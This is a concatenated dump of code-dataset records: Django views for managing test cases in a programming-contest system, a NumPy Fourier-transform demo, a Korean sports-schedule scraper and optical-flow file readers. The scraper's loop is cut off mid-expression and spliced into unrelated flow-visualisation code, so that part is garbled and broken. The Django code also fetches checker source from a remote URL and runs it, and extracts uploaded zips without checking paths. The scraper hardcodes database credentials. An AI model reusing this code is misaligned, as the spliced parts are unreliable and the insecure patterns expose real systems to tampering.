\"OK\",\n                    \"detail\": run_result\n                })\n                if run_result[\"verdict\"] != \"OK\":\n                    failed = True\n            current_task.status = -2\n            current_task.report = json.dumps(result)\n            current_task.save()\n            current_task.status = -1 if failed else 0\n            current_task.save()  # persist the final status\n        except CompileError as e:\n            current_task.report = json.dumps([{\"success\": False, \"error\": e.error}])\n            current_task.status = -1\n            current_task.save()\n\n    @staticmethod\n    def validate_case(revision, case_set, validator):\n        \"\"\"\n        report: similar to generating cases, [{ }, { }, ... { }]\n        \"\"\"\n        current_task = Task.objects.create(revision=revision, abstract=\"VALIDATE, %d cases\" % len(case_set))\n        try:\n            runner = Runner(validator)\n            result = []\n            failed = False\n            for case in case_set:\n                output_path = path.join(runner.workspace, \"out\")\n                error_path = path.join(runner.workspace, \"err\")\n                log_path = path.join(runner.workspace, \"log\")\n                args = [\"--testOverviewLogFileName\", log_path]\n                if revision.enable_group:\n                    args.extend([\"--group\", str(case.group)])\n                if case.in_samples:\n                    args.extend([\"--testset\", \"samples\"])\n                elif case.in_pretests:\n                    args.extend([\"--testset\", \"pretests\"])\n                run_result = runner.run(args=args,\n                                        stdin=case.input_file.path, stdout=output_path, stderr=error_path,\n                                        max_time=revision.time_limit * 3 / 1000,\n                                        max_memory=revision.memory_limit * 2)\n                with transaction.atomic():\n                    result.append({\n                        \"case_number\": case.case_number,\n                        \"success\": run_result[\"verdict\"] == \"OK\",\n                        \"comment\": CaseManagementTools.read_abstract(output_path),\n                        \"stderr\": CaseManagementTools.read_abstract(error_path),\n                        \"log\": CaseManagementTools.read_abstract(log_path),\n                        \"exit_code\": run_result[\"exit_code\"]\n                    })\n                    if run_result[\"verdict\"] != \"OK\":\n                        failed = True\n            current_task.status = -2\n            current_task.report = json.dumps(result)\n            current_task.save()\n            current_task.status = -1 if failed else 0\n            current_task.save()  # persist the final status\n        except CompileError as e:\n            current_task.report = json.dumps([{\"success\": False, \"error\": e.error}])\n            current_task.status = -1\n            current_task.save()\n\n    @staticmethod\n    def read_abstract(file_path, read_size=1024):\n        try:\n            with open(file_path, \"r\") as f:\n                t = f.read(read_size + 1)\n                if len(t) > read_size:\n                    return t[:read_size] + '...'\n                return t\n        except FileNotFoundError:\n            return ''\n\n    @staticmethod\n    def obtain_defaultspj():\n        try:\n            import requests\n            code = requests.get(\"https://raw.githubusercontent.com/ultmaster/ejudge/v2.1/lib/defaultspj.cpp\").text\n            program = Program(name=\"defaultspj\", lang=\"cpp\", code=code, tag=\"checker\")\n            program.save_fingerprint()\n            return program\n        except:\n            raise ValueError(\"Default checker cannot be obtained. 
Check network connections.\")\n\n @staticmethod\n def check_case(revision, case_set, solution_set, checker):\n \"\"\"\n response: {\n \"success\": True / False,\n \"error\": ...,\n \"tasks\": [\n {\n \"verdict\": \"OK\",\n \"solution\": 23,\n \"case_number\": 45,\n \"time\": 15,\n \"memory\": 30,\n },\n ...\n ],\n \"summary\": {\n solution_number: {\n time, max_time, memory, points\n }\n }\n }\n \"\"\"\n current_task = Task.objects.create(revision=revision,\n abstract=\"CHECK, %d cases, %d solutions\" % (\n len(case_set), len(solution_set)))\n packed_result = {\"success\": True, \"tasks\": [], \"summary\": {}}\n try:\n solution_runners = [(solution, Runner(solution)) for solution in solution_set]\n if checker is None:\n checker = CaseManagementTools.obtain_defaultspj()\n checker_runner = Runner(checker)\n checker_result_path = path.join(checker_runner.workspace, \"result\")\n task_result = packed_result[\"tasks\"]\n verdict_for_each_solution = {solution.id: set() for solution in solution_set}\n for case in case_set:\n for solution, runner in solution_runners:\n output_path = path.join(runner.workspace, \"out\")\n err_path = path.join(runner.workspace, \"err\")\n result = {\"solution\": solution.id, \"case_number\": case.case_number, \"case_id\": case.id}\n running_result = runner.run(stdin=case.input_file.path, stdout=output_path,\n max_time=revision.time_limit / 1000,\n max_memory=revision.memory_limit)\n result.update(running_result)\n result.update(input=CaseManagementTools.read_abstract(case.input_file.path),\n answer=CaseManagementTools.read_abstract(case.output_file.path),\n output=CaseManagementTools.read_abstract(output_path),\n stderr=CaseManagementTools.read_abstract(err_path))\n\n if result[\"verdict\"] == \"OK\":\n # run checker\n checking_result = checker_runner.run(\n args=[case.input_file.path, output_path, case.output_file.path],\n stdout=checker_result_path,\n max_time=revision.time_limit / 1000 * 3,\n max_memory=revision.memory_limit)\n result.update(checker_comment=CaseManagementTools.read_abstract(checker_result_path),\n checker_exit_code=checking_result[\"exit_code\"])\n if checking_result[\"verdict\"] != \"OK\":\n result.update(verdict=\"WRONG_ANSWER\")\n\n if result[\"verdict\"] == \"OK\":\n result.update(points=case.points)\n else: result.update(points=0)\n result.update(total_points=case.points)\n\n verdict_for_each_solution[solution.id].add(result[\"verdict\"])\n task_result.append(result)\n for solution in solution_set:\n got_verdicts = verdict_for_each_solution[solution.id]\n if solution.tag in ('solution_main', 'solution_correct') and got_verdicts != {\"OK\"}:\n packed_result.update(success=False,\n error=\"'%s' claims to be correct, but got rejected in tests\" % solution.name)\n if solution.tag == 'solution_tle_or_ok' and got_verdicts != {\"TIME_LIMIT\", \"OK\"}:\n packed_result.update(success=False, error=\"'%s' claims to be tle_or_ok, but got %s\" % (\n solution.name, str(got_verdicts)))\n if solution.tag == 'solution_wa' and 'WRONG_ANSWER' not in got_verdicts:\n packed_result.update(success=False, error=\"'%s' claims to be WA, but never got WA\" % solution.name)\n if solution.tag == 'solution_incorrect' and got_verdicts == {\"OK\"}:\n packed_result.update(success=False,\n error=\"'%s' claims to be incorrect, but is actually correct\" % solution.name)\n if solution.tag == 'solution_fail' and \"RUNTIME_ERROR\" not in got_verdicts:\n packed_result.update(success=False, error=\"'%s' claims to fail, but didn't fail\" % solution.name)\n solution_based_result = 
list(filter(lambda x: x[\"solution\"] == solution.id, task_result))\n solution_time_summary = list(map(lambda x: x[\"time\"], solution_based_result)) + [0]\n packed_result[\"summary\"][solution.id] = {\n \"time\": max(solution_time_summary),\n \"sum_time\": sum(solution_time_summary),\n \"memory\": max(list(map(lambda x: x[\"memory\"], solution_based_result)) + [0]),\n \"points\": sum(list(map(lambda x: x[\"points\"], solution_based_result)) + [0]) /\n max(sum(list(map(lambda x: x[\"total_points\"], solution_based_result)) + [0]), 1) * 100\n }\n current_task.status = -2\n current_task.report = json.dumps(packed_result)\n current_task.save()\n except CompileError as e:\n packed_result.update(success=False, error=e.error)\n except ValueError as e:\n packed_result.update(success=True, error=e.args[0])\n current_task.status = 0 if packed_result[\"success\"] else -1\n current_task.report = json.dumps(packed_result)\n current_task.save()\n\n\nREFORMAT = CaseManagementTools.reformat\nNATURALIZE_ORDER = CaseManagementTools.naturalize_order\n\n\nclass RevisionCaseMixin(ProblemRevisionMixin):\n model_class = Case\n\n def init_revision(self, *args, **kwargs):\n super().init_revision(*args, **kwargs)\n if not self.verify_belong_to_revision(kwargs['cpk']):\n raise Http404(\"No cases found matching the query\")\n self.case = Case.objects.get(pk=kwargs['cpk'])\n\n\nclass RevisionMultipleCasesMixin(ProblemRevisionMixin):\n\n def init_revision(self, *args, **kwargs):\n super().init_revision(*args, **kwargs)\n self.pk_set = set(filter(lambda x: x, self.request.POST[\"gather\"].split(\",\")))\n if not self.pk_set:\n raise ValueError(\"Invalid selected cases\")\n self.case_set = self.revision.cases.filter(pk__in=self.pk_set).order_by(\"case_number\")\n if len(self.case_set) != len(self.pk_set):\n raise ValueError(\"Invalid selected cases\")\n\n def get_redirect_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n\nclass CaseList(ProblemRevisionMixin, ListView):\n template_name = 'polygon/problem2/case/list.jinja2'\n context_object_name = 'case_list'\n polygon_title = \"数据管理\"\n\n def get_queryset(self):\n qs = self.revision.cases.all().order_by(\"case_number\")\n for case in qs:\n case.comments = []\n if case.description:\n case.comments.append(case.description)\n if case.in_samples:\n case.comments.append(\"Sample\")\n if case.in_pretests:\n case.comments.append(\"Pretest\")\n if case.output_lock:\n case.comments.append(\"Output locked\")\n if not case.activated:\n case.comments.append(\"Excluded in tests\")\n case.comments.append(\"Worth %d pts.\" % case.points)\n return qs\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if not data['revision_readonly']:\n data[\"disable_grid\"] = True\n return data\n\n\nclass CaseCreateView(ProblemRevisionMixin, FormView):\n form_class = CaseCreateForm\n template_name = 'polygon/problem2/case/create.jinja2'\n polygon_title = \"添加数据\"\n\n def get_success_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n def form_valid(self, form):\n global_create_time = datetime.now()\n option = form.cleaned_data[\"option\"]\n case_number_start = form.cleaned_data[\"case_number\"]\n cases = []\n\n if option in (\"single\", \"text\"):\n if option == \"single\":\n input_binary = REFORMAT(form.cleaned_data[\"input_file\"].read(), self.revision.well_form_policy)\n output_binary = REFORMAT(form.cleaned_data[\"output_file\"].read(), 
self.revision.well_form_policy)\n description = \"File \\\"%s\\\" and \\\"%s\\\"\" % (\n form.cleaned_data[\"input_file\"].name, form.cleaned_data[\"output_file\"].name)\n else:\n input_binary = REFORMAT(form.cleaned_data[\"input_text\"].encode(), self.revision.well_form_policy)\n output_binary = REFORMAT(form.cleaned_data[\"output_text\"].encode(), self.revision.well_form_policy)\n description = \"Typed-in case\"\n case = Case(create_time=global_create_time,\n in_samples=form.cleaned_data[\"in_samples\"],\n output_lock=form.cleaned_data[\"output_lock\"],\n description=description,\n activated=form.cleaned_data[\"activated\"])\n case.input_file.save(\"in\", ContentFile(input_binary), save=False)\n case.output_file.save(\"out\", ContentFile(output_binary), save=False)\n case.save_fingerprint(self.problem.id)\n cases.append(case)\n\n elif option == \"batch\":\n tmp_directory = '/tmp/' + random_string()\n with zipfile.ZipFile(form.cleaned_data[\"batch_file\"]) as myZip:\n myZip.extractall(path=tmp_directory)\n case_config = {}\n if path.exists(path.join(tmp_directory, \"data.json\")):\n with open(path.join(tmp_directory, \"data.json\")) as json_config:\n case_config = json.loads(json_config.read())\n for inf, ouf in sort_data_list_from_directory(tmp_directory):\n with open(path.join(tmp_directory, inf), 'rb') as ins, open(path.join(tmp_directory, ouf),\n 'rb') as ous:\n conf = case_config.get(inf, {})\n case = Case(create_time=global_create_time,\n description=conf.get(\"description\", \"From \\\"%s\\\": (%s, %s)\" %\n (form.cleaned_data[\"batch_file\"].name, inf, ouf)),\n in_samples=conf.get(\"in_samples\", False),\n in_pretests=conf.get(\"in_pretests\", False),\n activated=conf.get(\"activated\", True),\n group=conf.get(\"group\", 0),\n output_lock=conf.get(\"output_lock\", False),\n points=conf.get(\"points\", 10))\n if self.revision.well_form_policy:\n case.input_file.save(\"in\", ContentFile(REFORMAT(ins.read(), True)), save=False)\n case.output_file.save(\"out\", ContentFile(REFORMAT(ous.read(), True)), save=False)\n else:\n case.input_file.save(\"in\", File(ins), save=False)\n case.output_file.save(\"out\", File(ous), save=False)\n case.save_fingerprint(self.problem.id)\n cases.append(case)\n shutil.rmtree(tmp_directory)\n\n elif option == \"batch_input\":\n tmp_directory = '/tmp/' + random_string()\n with zipfile.ZipFile(form.cleaned_data[\"batch_file\"]) as myZip:\n myZip.extractall(path=tmp_directory)\n for file in special_sort(os.listdir(tmp_directory)):\n file_abspath = os.path.join(tmp_directory, file)\n if os.path.isdir(file_abspath) or file.startswith(\".\"):\n continue\n with open(path.join(tmp_directory, file), 'rb') as in_file:\n case = Case(create_time=global_create_time, description=\"File \\\"%s\\\"\" % file)\n if self.revision.well_form_policy:\n case.input_file.save(\"in\", ContentFile(REFORMAT(in_file.read(), True)), save=False)\n else:\n case.input_file.save(\"in\", File(in_file), save=False)\n case.output_file.save(\"out\", ContentFile(\"\"), save=False)\n case.save_fingerprint(self.problem.id)\n cases.append(case)\n shutil.rmtree(tmp_directory)\n\n elif option == \"gen\":\n commands = list(map(lambda x: \" \".join(x.split()),\n filter(lambda x: x, form.cleaned_data[\"gen_command\"].split(\"\\n\"))))\n async_task(CaseManagementTools.generate_cases, self.revision, commands)\n\n # process case numbers\n remove_list = []\n if case_number_start <= 0:\n # auto fill the empty indices\n idx = 1\n exist = set(self.revision.cases.all().values_list(\"case_number\", 
flat=True))\n            for case in cases:\n                while idx in exist:\n                    idx += 1\n                exist.add(idx)\n                case.case_number = idx\n        else:\n            idx = case_number_start\n            for case in cases:\n                case.case_number = idx\n                idx += 1\n            for case in self.revision.cases.filter(case_number__gte=case_number_start).order_by(\"case_number\"):\n                # do modifications to modified cases\n                if idx != case.case_number:\n                    case.case_number = idx\n                    idx += 1\n                    case.parent_id = case.id\n                    remove_list.append(Case(pk=case.id))\n                    case.id = None\n                    cases.append(case)\n\n        with transaction.atomic():\n            for case in cases:\n                case.save()\n            self.revision.cases.add(*cases)\n            self.revision.cases.remove(*remove_list)\n\n        messages.success(self.request, \"%d case(s) have been added. Generated cases may still be processing in the background.\" % len(cases))\n\n        return redirect(self.get_success_url())\n\n\nclass CaseUpdateFileView(RevisionCaseMixin, FormView):\n    form_class = CaseUpdateForm\n    template_name = 'polygon/problem2/case/update.jinja2'\n    polygon_title = \"Update Case\"\n\n    def get_success_url(self):\n        return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n    def get_object(self):\n        return self.case\n\n    def form_valid(self, form):\n        with transaction.atomic():\n            object = self.get_object()\n            if form.cleaned_data[\"option\"] == \"file\":\n                input_binary = REFORMAT(form.cleaned_data[\"input_file\"].read(), self.revision.well_form_policy)\n                output_binary = REFORMAT(form.cleaned_data[\"output_file\"].read(), self.revision.well_form_policy)\n            else:\n                input_binary = REFORMAT(form.cleaned_data[\"input_text\"].encode(), self.revision.well_form_policy)\n                output_binary = REFORMAT(form.cleaned_data[\"output_text\"].encode(), self.revision.well_form_policy)\n            with UpdateManager(object, self.revision) as object:\n                object.input_file.save(\"in\", ContentFile(input_binary), save=False)\n                object.output_file.save(\"out\", ContentFile(output_binary), save=False)\n                object.save_fingerprint(self.problem.id)\n        return redirect(self.get_success_url())\n\n\nclass CaseUpdateInfoView(RevisionCaseMixin, UpdateView):\n    form_class = CaseUpdateInfoForm\n    template_name = 'polygon/problem2/simple_form.jinja2'\n    polygon_title = \"Update Case\"\n\n    def get_success_url(self):\n        return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n    def get_object(self, queryset=None):\n        return self.case\n\n    def form_valid(self, form):\n        with transaction.atomic():\n            with UpdateManager(self.object, self.revision) as case:\n                case = form.save()\n        return redirect(self.get_success_url())\n\n\nclass CaseDeleteView(RevisionCaseMixin, View):\n    def post(self, request, *args, **kwargs):\n        try:\n            self.revision.cases.remove(self.case)\n            return redirect(reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id}))\n        except Case.DoesNotExist:\n            raise Http404(\"No cases found matching the query\")\n\n\nclass CaseFullInputOutputView(RevisionCaseMixin, View):\n    def get(self, request, *args, **kwargs):\n        if \"t\" not in request.GET or request.GET[\"t\"].lower() not in (\"input\", \"output\"):\n            return HttpResponseBadRequest()\n        if request.GET[\"t\"].lower() == \"input\":\n            p = self.case.input_file.read()\n        else: p = self.case.output_file.read()\n        return HttpResponse(p, content_type=\"text/plain; charset=utf-8\")\n\n\nclass CaseNaturalizeOrderView(ProblemRevisionMixin, View):\n    def post(self, request, *args, **kwargs):\n        if request.GET.get(\"group\"):\n            qs = self.revision.cases.all().order_by(\"group\", \"case_number\")\n            qs = list(filter(lambda x: 
x.group != 0, qs)) + list(filter(lambda x: x.group == 0, qs))\n        else:\n            qs = self.revision.cases.all().order_by(\"case_number\")\n        NATURALIZE_ORDER(self.revision, qs)\n        return redirect(reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id}))\n\n\nclass CaseMoveOrderView(RevisionMultipleCasesMixin, View):\n    def post(self, request, *args, **kwargs):\n        after = int(request.POST.get(\"answer\") or 0)\n        other_case_set = self.revision.cases.exclude(pk__in=self.pk_set).order_by(\"case_number\")\n        insert_pos = 0\n        while insert_pos < len(other_case_set) and other_case_set[insert_pos].case_number <= after:\n            insert_pos += 1\n        ret = other_case_set[:insert_pos] + list(self.case_set) + other_case_set[insert_pos:]\n        NATURALIZE_ORDER(self.revision, ret)\n        return redirect(self.get_redirect_url())\n\n\nclass CaseDeleteSelectedView(RevisionMultipleCasesMixin, View):\n    def post(self, request, *args, **kwargs):\n        self.revision.cases.remove(*list(self.case_set))\n        NATURALIZE_ORDER(self.revision, self.revision.cases.all().order_by(\"case_number\"))\n        return redirect(self.get_redirect_url())\n\n\nclass CaseToggleSampleView(RevisionMultipleCasesMixin, View):\n    def post(self, request, *args, **kwargs):\n        for case in self.case_set:\n            with UpdateManager(case, self.revision) as case:\n                case.in_samples = not case.in_samples\n        return redirect(self.get_redirect_url())\n\n\nclass CaseTogglePretestView(RevisionMultipleCasesMixin, View):\n    def post(self, request, *args, **kwargs):\n        for case in self.case_set:\n            with UpdateManager(case, self.revision) as case:\n                case.in_pretests = not case.in_pretests\n        return redirect(self.get_redirect_url())\n\n\nclass CaseRunSelectedOutput(RevisionMultipleCasesMixin, View):\n    def post(self, request, *args, **kwargs):\n        try:\n            solution = self.revision.programs.get(tag=\"solution_main\")\n            async_task(CaseManagementTools.run_case_output, self.revision, self.case_set, solution)\n        except (Program.MultipleObjectsReturned, Program.DoesNotExist):\n            messages.error(request, \"There should be exactly one main correct solution!\")\n        return redirect(self.get_redirect_url())\n\n\nclass CaseValidateInput(RevisionMultipleCasesMixin, View):\n    def post(self, request, *args, **kwargs):\n        try:\n            validator = self.revision.active_validator\n            if validator is None:\n                raise Program.DoesNotExist\n            async_task(CaseManagementTools.validate_case, self.revision, self.case_set, validator)\n        except (Program.MultipleObjectsReturned, Program.DoesNotExist):\n            messages.error(request, \"Validator should be selected!\")\n        return redirect(self.get_redirect_url())\n\n\nclass CaseCheckView(ProblemRevisionMixin, TemplateView):\n    template_name = 'polygon/problem2/case/check.jinja2'\n    raise_exception = True\n    polygon_title = \"验证数据\"\n\n    def get_context_data(self, **kwargs):\n        data = super().get_context_data(**kwargs)\n        if 'gather' not in self.request.GET:\n            raise PermissionDenied\n        data['select_cases'] = self.request.GET['gather']\n        data['program_list'] = self.revision.programs.filter(tag__contains='solution').all()\n        return data\n\n    def post(self, request, *args, **kwargs):\n        case_pk_set = set(filter(lambda x: x, request.POST[\"cases\"].split(\",\")))\n        if not case_pk_set:\n            messages.error(request, \"Invalid selected cases\")\n            return redirect(request.path)\n        case_set = self.revision.cases.filter(pk__in=case_pk_set).order_by(\"case_number\")\n        program_pk_set = set()\n        for p, switch in request.POST.items():\n            if switch == 'on' and p.isdigit():\n                program_pk_set.add(int(p))\n        if not program_pk_set:\n
messages.error(request, \"Please select at least one solution.\")\n program_set = self.revision.programs.filter(pk__in=program_pk_set)\n if len(case_pk_set) != len(case_set) or len(program_pk_set) != len(program_set):\n messages.error(request, \"Invalid selected cases or solutions.\")\n async_task(CaseManagementTools.check_case, self.revision, case_set, program_set, self.revision.active_checker)\n return redirect(reverse('polygon:revision_task', kwargs={'pk': self.problem.id, 'rpk': self.revision.id}))\n\n\nclass CasePackAsZipView(ProblemRevisionMixin, View):\n def get_redirect_url(self):\n return reverse('polygon:revision_case', kwargs={'pk': self.problem.id, 'rpk': self.revision.id})\n\n def get(self, request, *args, **kwargs):\n input_only = False\n if 'input' in request.GET:\n input_only = True\n cases = list(self.revision.cases.all().order_by(\"case_number\"))\n if len(cases) == 0:\n messages.error(request, \"There are no cases to pack.\")\n return redirect(self.get_redirect_url())\n for idx, case in enumerate(cases):\n if idx > 0 and case.case_number == cases[idx - 1].case_number:\n messages.error(request, \"Cases refuse to pack because there are two cases with the same case number.\")\n return redirect(self.get_redirect_url())\n file_path = path.join(settings.GENERATE_DIR, random_string())\n case_config = {}\n with zipfile.ZipFile(file_path, \"w\", zipfile.ZIP_DEFLATED) as zip:\n for case in cases:\n zip.write(case.input_file.path, arcname=\"%d\" % case.case_number)\n if not input_only:\n zip.write(case.output_file.path, arcname=\"%d.a\" % case.case_number)\n case_config[str(case.case_number)] = {\n \"in_samples\": case.in_samples,\n \"in_pretests\": case.in_pretests,\n \"activated\": case.activated,\n \"group\": case.group,\n \"output_lock\": case.output_lock,\n \"description\": case.description,\n \"points\": case.points\n }\n if not input_only:\n zip.writestr(\"data.json\", json.dumps(case_config, sort_keys=True, indent=2))\n\n return respond_generate_file(request, file_path,\n \"PackedTestCases - %s#%d.zip\" % (self.problem.alias, self.revision.revision))\n\n\nclass CaseAssignGroupView(RevisionMultipleCasesMixin, View):\n def post(self, request, *args, **kwargs):\n group_number = int(request.POST.get(\"answer\") or 0)\n for case in self.case_set:\n with UpdateManager(case, self.revision) as case:\n case.group = group_number\n return redirect(self.get_redirect_url())\n","sub_path":"polygon/problem2/views/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":36584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"537277010","text":"\nimport numpy as np\nimport matplotlib.pyplot as mpl\n\nnum = 512\nr = 1.0 / num\nt = np.linspace(0.0,1.0,num)\n\nw1 = 32\nw2 = 13\n\ns = 2.0 * np.cos(2.0 * np.pi * w1 * t) + np.cos(2.0 * np.pi * w2 * t)\nre = np.zeros(num)\nim = np.zeros(num)\nf = re + 1.0j * im\n\nfor k in range(0,num) :\n for n in range(0,num) :\n factor = 2.0 * np.pi * k / num * n\n f[k] += s[n] * np.cos(factor) + s[n] * np.sin(factor) * 1.0j\n\nf_x = np.linspace(0.0,num / 2.0,num / 2.0)\nf_y = 2.0 / num * np.abs(f[0 : num / 2.0])\n\nfig = mpl.figure(1)\nfig.canvas.set_window_title('fourier transform demo') 
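Editor's aside (not part of the record above): the numpy_fft_test.py record computes the DFT with an O(N^2) double loop and slices with float indices (num / 2.0), which raises a TypeError on Python 3. Below is a minimal sketch of the idiomatic NumPy equivalent, assuming nothing beyond numpy; endpoint=False is a small tweak versus the record's linspace so the two tones land exactly on FFT bins.

import numpy as np

num = 512
t = np.linspace(0.0, 1.0, num, endpoint=False)
s = 2.0 * np.cos(2.0 * np.pi * 32 * t) + np.cos(2.0 * np.pi * 13 * t)

f = np.fft.fft(s)                         # O(N log N) instead of the O(N^2) double loop
half = num // 2                           # integer division: float slice indices fail on Python 3
magnitude = 2.0 / num * np.abs(f[:half])  # one-sided amplitude spectrum
print(np.argsort(magnitude)[-2:])         # the two dominant bins: 13, then 32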
\nmpl.subplot(211)\nmpl.plot(t,s)\nmpl.title('time')\nmpl.subplot(212)\nmpl.plot(f_x,f_y)\nmpl.title('frequency')\nmpl.grid()\nmpl.show()\n\n","sub_path":"python/00..tat_signal_process/numpy_fft_test.py","file_name":"numpy_fft_test.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53810078","text":"#-*- coding: utf-8 -*-\r\n#by forever1296\r\n#패키지 import\r\nimport requests\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nimport pymysql.cursors\r\n\r\n#오늘 날짜\r\nnow_all = datetime.now()\r\nnow_want = now_all.strftime('%Y%m%d')\r\n\r\n# n,m = 월\r\nn = 0\r\nm = 1\r\ncount = 1\r\n\r\nconn = pymysql.connect(host='localhost',\r\n user='root',\r\n password='root',\r\n db='Sports',\r\n charset='utf8')\r\n\r\n#월 01~05 08~12 변경위한 while문\r\nwhile count!=11:\r\n # 해당 url에서 html을 불러옴.\r\n url = requests.get('https://sports.news.naver.com/wfootball/schedule/index.nhn?year=2019&month=' + str(n) + str(m) + '&category=epl&date=20200108')\r\n urlc = url.content\r\n html = str(BeautifulSoup(urlc,\"html.parser\"))\r\n #저장된 html에서 find_all 함수를 이용하여 원하는 태그유형,이름을 찾음.\r\n #변수.find(\"태그명\",{\"타입\":\"찾고자하는클래스명\"}\r\n #data = str(html.find_all(\"script\",{\"type\":\"text/javascript\"}))\r\n\r\n #저장이 정상적으로 되었는지 확인.\r\n #print(data)\r\n\r\n #split 구현 \"을 기준으로 구분하여 배열로 저장.\r\n sdata = html.split('\"')\r\n\r\n #split 정상적으로 되었는지 확인\r\n #print(sdata[6])\r\n\r\n #필요한 데이터 -> date / scheduleList / homeTeamName / awayTeamName / homeTeamScore / awayTeamScore / state 등\r\n i = 0\r\n p=-1\r\n l=0\r\n rdata = list()\r\n DATE = list()\r\n #while문을 이용하여 필요한 데이터 저장\r\n while i UNKNOWN_FLOW_THRESH) | (abs(v) > UNKNOWN_FLOW_THRESH)\n u[idxUnknow] = 0\n v[idxUnknow] = 0\n\n maxu = max(maxu, np.max(u))\n minu = min(minu, np.min(u))\n\n maxv = max(maxv, np.max(v))\n minv = min(minv, np.min(v))\n\n # print \"max flow: %.4f flow range: u = %.3f .. %.3f; v = %.3f .. 
%.3f\" %\n # (maxrad, minu,maxu, minv, maxv)\n rad = np.sqrt(u**2 + v**2)\n maxrad = max(maxrad, np.max(rad))\n\n u = u / (maxrad + np.finfo(float).eps)\n v = v / (maxrad + np.finfo(float).eps)\n\n img = compute_color(u, v)\n\n idx = np.repeat(idxUnknow[:, :, np.newaxis], 3, axis=2)\n img[idx] = 0\n\n return np.uint8(img)\n\n\ndef compute_color(u, v):\n [h, w] = u.shape\n img = np.zeros([h, w, 3])\n nanIdx = np.isnan(u) | np.isnan(v)\n u[nanIdx] = 0\n v[nanIdx] = 0\n\n colorwheel = make_color_wheel()\n ncols = np.size(colorwheel, 0)\n\n rad = np.sqrt(u**2 + v**2)\n\n a = np.arctan2(-v, -u) / np.pi\n\n fk = (a + 1) / 2 * (ncols - 1) + 1\n\n k0 = np.floor(fk).astype(int)\n\n k1 = k0 + 1\n k1[k1 == ncols + 1] = 1\n f = fk - k0\n\n for i in range(0, np.size(colorwheel, 1)):\n tmp = colorwheel[:, i]\n col0 = tmp[k0 - 1] / 255\n col1 = tmp[k1 - 1] / 255\n col = (1 - f) * col0 + f * col1\n\n idx = rad <= 1\n col[idx] = 1 - rad[idx] * (1 - col[idx])\n notidx = np.logical_not(idx)\n\n col[notidx] *= 0.75\n img[:, :, i] = np.uint8(np.floor(255 * col * (1 - nanIdx)))\n\n return img\n\n\ndef make_color_wheel():\n RY = 15\n YG = 6\n GC = 4\n CB = 11\n BM = 13\n MR = 6\n\n ncols = RY + YG + GC + CB + BM + MR\n\n colorwheel = np.zeros([ncols, 3])\n\n col = 0\n\n # RY\n colorwheel[0:RY, 0] = 255\n colorwheel[0:RY, 1] = np.transpose(np.floor(255 * np.arange(0, RY) / RY))\n col += RY\n\n # YG\n colorwheel[col:col + YG, 0] = 255 - np.transpose(np.floor(\n 255 * np.arange(0, YG) / YG))\n colorwheel[col:col + YG, 1] = 255\n col += YG\n\n # GC\n colorwheel[col:col + GC, 1] = 255\n colorwheel[col:col + GC, 2] = np.transpose(np.floor(255 * np.arange(\n 0, GC) / GC))\n col += GC\n\n # CB\n colorwheel[col:col + CB, 1] = 255 - np.transpose(np.floor(\n 255 * np.arange(0, CB) / CB))\n colorwheel[col:col + CB, 2] = 255\n col += CB\n\n # BM\n colorwheel[col:col + BM, 2] = 255\n colorwheel[col:col + BM, 0] = np.transpose(np.floor(\n 255 * np.arange(0, BM) / BM))\n col += + BM\n\n # MR\n colorwheel[col:col + MR, 2] = 255 - np.transpose(np.floor(\n 255 * np.arange(0, MR) / MR))\n colorwheel[col:col + MR, 0] = 255\n\n return colorwheel\n\n\n# Flow I/O\ndef read_flow_kitti(path):\n \"\"\" Read filepath (string), return (flow: np.float64, valid: bool). \"\"\"\n img3d = read_PNG_u16(path)\n flow = (img3d[:, :, 0:2].astype('float64') - 2**15) / 64.0\n valid = img3d[:, :, 2].astype('bool')\n flow[~valid, :] = 0# instead of ------> 10**9\n\n return flow, valid\n# produces similar results !!!!!!!!!!!\ndef read_gen_flow(png_path): #for flows only\n flo_file = cv2.imread(png_path,cv2.IMREAD_UNCHANGED)\n flo_img = flo_file[:,:,2:0:-1].astype(np.float32)\n invalid = (flo_file[:,:,0] == 0)\n #normalize flow !!!!!\n flo_img = flo_img - 32768\n flo_img = flo_img / 64\n flo_img[np.abs(flo_img) < 1e-10] = 1e-10\n flo_img[invalid, :] = 0\n valid = ~invalid.astype(bool)\n return(flo_img),(valid)\n\n\ndef read_flow_vkitti(path):\n \"\"\" Read png file and return (flow, valid). \"\"\"\n img3d = read_PNG_u16(path)\n h, w, __ = img3d.shape\n valid = img3d[:, :, 2] != 0\n flow = 2.0 * img3d[:, :, :2].astype(np.float64) / float(2**16 - 1) - 1\n flow[:, :, 0] *= w - 1\n flow[:, :, 1] *= h - 1\n flow[~valid, :] = 10**9\n\n return flow, valid\n\n\ndef read_flow_freiburg(path):\n \"\"\" Read pfm file and return (flow, valid). \"\"\"\n flow, scale = read_PFM(path)\n flow = flow[:, :, :2]\n flow *= scale\n valid = np.ones(flow.shape[:2]).astype('bool')\n return flow, valid\n\n\ndef read_flow_flo(filename):\n \"\"\" Read flo file and return flow array. 
